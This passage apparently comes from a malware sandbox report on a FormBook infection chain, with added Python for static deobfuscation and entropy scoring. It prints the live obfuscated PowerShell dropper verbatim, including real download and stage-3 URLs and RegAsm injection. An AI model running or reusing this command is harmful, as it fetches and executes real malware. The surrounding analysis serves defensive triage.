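The PowerShell command line above is obfuscated in three layers that can all be undone without executing it: the script is split into string literals joined with '+', the tokens PvL and tA4 stand in for $ and the single quote and are swapped back by the two rePLACe() calls whose arguments are built from [cHar] codes, and the first argument handed to RunPE.Home.VAI is a URL written backwards, which the loader's ReverseString method (listed under Home.cs below) turns around at run time. The Python below is an added example written for this page, not code from the report or the sandbox. It takes the command line as recorded, rebuilds the readable script, pulls out the download URL, the reflection target and the reversed URL, and mirrors the loader's marker search on a constructed stand-in for new_image.jpg; the real stage-2 payload is not reproduced, only a fake PE stub between the same markers.

```python
import base64
import re

# The obfuscated command line recorded in this report (the value passed to
# powershell.exe -Command), reproduced verbatim as the input to deobfuscate().
COMMAND = (
    "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/"
    "new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+"
    "'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+"
    "'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+"
    "' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::"
    "UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag"
    " = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); "
    "PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+"
    "'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length"
    " = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+"
    "' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String("
    "PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+"
    "'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype."
    "GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , "
    "tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }')"
    ".rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),"
    "[StRInG][cHar]39)| IEx"
)

# one .rePLACe(old, new) call; each argument is a ([cHar]N+...) group, a quoted literal or a bare [cHar] expression
REPLACE_CALL = re.compile(
    r"\.replace\(\s*(\([^)]*\)|'[^']*'|[^,()]+?)\s*,\s*(\([^)]*\)|'[^']*'|[^)]+?)\s*\)", re.I)


def resolve_char_expr(expr):
    """Evaluate the tiny PowerShell expressions used as rePLACe() arguments:
    ([cHar]80+[cHar]118+[cHar]76) -> 'PvL', [StRInG][cHar]39 -> "'", '$' -> '$'."""
    expr = expr.strip()
    codes = re.findall(r"\[char\](\d+)", expr, flags=re.I)
    if codes:
        return "".join(chr(int(c)) for c in codes)
    literal = re.fullmatch(r"'(.*)'", expr)
    if literal:
        return literal.group(1)
    raise ValueError("unsupported rePLACe() argument: " + expr)


def deobfuscate(command):
    """Rebuild the script statically: join the concatenated literals, then apply
    the rePLACe() chain in order. Nothing is evaluated, so no IEX is needed."""
    first = re.search(r"\.replace\(", command, re.I)
    if not first:
        raise ValueError("no rePLACe() chain found")
    body, tail = command[:first.start()], command[first.start():]
    script = "".join(re.findall(r"'([^']*)'", body))      # 'a'+'b'+'c' -> abc
    for call in REPLACE_CALL.finditer(tail):
        old, new = (resolve_char_expr(arg) for arg in call.groups())
        script = script.replace(old, new)
    return script


def extract_indicators(script):
    urls = re.findall(r"https?://[^\s'\"]+", script)
    invoke = re.search(r"\[object\[\]\]\s*\((.*?)\)\)", script)
    args = re.findall(r"'([^']*)'", invoke.group(1)) if invoke else []
    loader_type = re.search(r"GetType\('([^']+)'\)", script)
    loader_method = re.search(r"GetMethod\('([^']+)'\)", script)
    return {
        "stage2_url": urls[0] if urls else None,
        "loader_type": loader_type.group(1) if loader_type else None,
        "loader_method": loader_method.group(1) if loader_method else None,
        "runpe_args": args,
        "stage3_url": args[0][::-1] if args else None,   # Home.ReverseString undoes this at run time
        "inject_target": args[4] if len(args) > 4 else None,
    }


START_MARK, END_MARK = b"<<BASE64_START>>", b"<<BASE64_END>>"


def carve_stage2(blob):
    """Mirror the loader's marker search on the downloaded 'image' and decode the
    base64 between the markers; None when the markers are absent or out of order."""
    start, end = blob.find(START_MARK), blob.find(END_MARK)
    if start < 0 or end <= start:
        return None
    return base64.b64decode(blob[start + len(START_MARK):end])


# Constructed stand-in for new_image.jpg: a JPEG header, padding, then the markers
# wrapping a fake PE stub. This is not the real stage-2 assembly.
FAKE_ASSEMBLY = b"MZ\x90\x00" + b"constructed stage-2 stand-in, not a real assembly"
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
                + START_MARK + base64.b64encode(FAKE_ASSEMBLY) + END_MARK + b"\xff\xd9")


if __name__ == "__main__":
    readable = deobfuscate(COMMAND)
    print(readable)
    for key, value in extract_indicators(readable).items():
        print(f"{key}: {value}")
    print("carved:", carve_stage2(SAMPLE_IMAGE)[:4])
```

Run as-is the script prints the rebuilt PowerShell, the uploaddeimagens.com.br stage-2 URL, the RunPE.Home / VAI reflection target, the reversed argument turned back into an http URL, and RegAsm as the fifth argument, which matches the RegAsm.exe process that the sandbox observed being spawned and later flagged as FormBook. The carving function is the part worth keeping for triage: the same marker convention shows up across campaigns that hide a base64 assembly inside an image hosted on a public file service.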
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_002A21D8 push ebx; iretd 10_2_002A21EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00414023 push esp; iretd 12_2_0041403D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_004021C2 push ebp; ret 12_2_004021CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00402209 push ebp; ret 12_2_004021CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00411B15 push ss; retf 12_2_00411B46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00403400 push eax; ret 12_2_00403402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041A408 pushfd ; ret 12_2_0041A409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00404D15 pushfd ; iretd 12_2_00404D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00408605 push ss; retf 12_2_0040861C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040773F push edx; iretd 12_2_0040774B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0239DFA1 push ecx; ret 12_2_0239DFB4
Source: 10.2.powershell.exe.280000.0.raw.unpack, Home.cs High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.280000.0.raw.unpack, Class2.cs High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Home.cs High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.cs High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Class2.cs High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Home.cs High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.cs High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Class2.cs High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
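The "High entropy of concatenated method names" indicators above rest on one statistic: the Shannon entropy of all of a class's method names joined together. Auto-generated names such as wj8oxcKQMhWyu3MiMB draw on upper case, lower case and digits almost uniformly, whereas hand-written names reuse a few letters. The Python below is an added example, not the sandbox's implementation; it computes that statistic for the method names listed in this report and for a constructed benign control. The 4.8-bit cut-off is an assumption made for the example, since the report does not state the threshold it uses.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Bits per character of the empirical symbol distribution of `text`."""
    if not text:
        return 0.0
    n, counts = len(text), Counter(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def method_name_entropy(names):
    """Entropy of the concatenated method names, the quantity behind the
    'High entropy of concatenated method names' indicator."""
    return shannon_entropy("".join(names))


# Assumed cut-off for this example; the sandbox's own threshold is not given in the report.
DEFAULT_THRESHOLD = 4.8


def flag_classes(classes, threshold=DEFAULT_THRESHOLD):
    """Map class name -> entropy (rounded) for every class at or above the threshold."""
    scored = {cls: round(method_name_entropy(names), 2) for cls, names in classes.items()}
    return {cls: h for cls, h in scored.items() if h >= threshold}


# Method names exactly as listed in this report for 10.2.powershell.exe.280000.0.raw.unpack
LOADER_CLASSES = {
    "Home.cs": ['VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ',
                'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq',
                'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'],
    "RunPEE.cs": ['Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress',
                  'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'],
    "Class2.cs": ['Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp',
                  'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA',
                  'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'],
}

# Constructed control: names typical of hand-written, unobfuscated .NET code
BENIGN_CLASSES = {
    "Logger.cs": ['Start', 'Stop', 'Reset', 'Open', 'Close', 'Dispose', 'ToString',
                  'GetName', 'SetName', 'WriteLine'],
}


if __name__ == "__main__":
    for group in (LOADER_CLASSES, BENIGN_CLASSES):
        for cls, names in group.items():
            print(f"{cls:12s} {method_name_entropy(names):.2f} bits/char")
    print("flagged:", flag_classes(LOADER_CLASSES))
```

Note that RunPEE.cs keeps readable names (LoadLibraryA, GetProcAddress, HandleRun) next to two generated ones, so its score sits closer to the boundary than Home.cs or Class2.cs; that is why the names themselves, not just the score, are worth reading: ReverseString explains the backwards URL in the command line, and LoadLibraryA/GetProcAddress mark the native-API resolution the report flags separately.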

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\ilang.in\DavWWWRoot (2 times)
Source: Office document LLM: Score: 9 Reasons: The document prominently displays the logo of a well-known brand (Office) which could be used to impersonate the brand and gain the user's trust. The text creates a sense of urgency and interest by instructing the user to 'Open the document in Microsoft Office' and to 'Enable Editing' and 'Enable Content' from the yellow bar above. These instructions are commonly used in phishing attacks to trick users into enabling macros, which can then execute malicious code. The combination of brand impersonation, urgency, and specific instructions to enable potentially harmful features significantly increases the risk of phishing or malware.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: ima.imim.im.imim[1].doc.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: DD4612E1.doc.4.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess, 7_2_036407AB
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (15 times)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
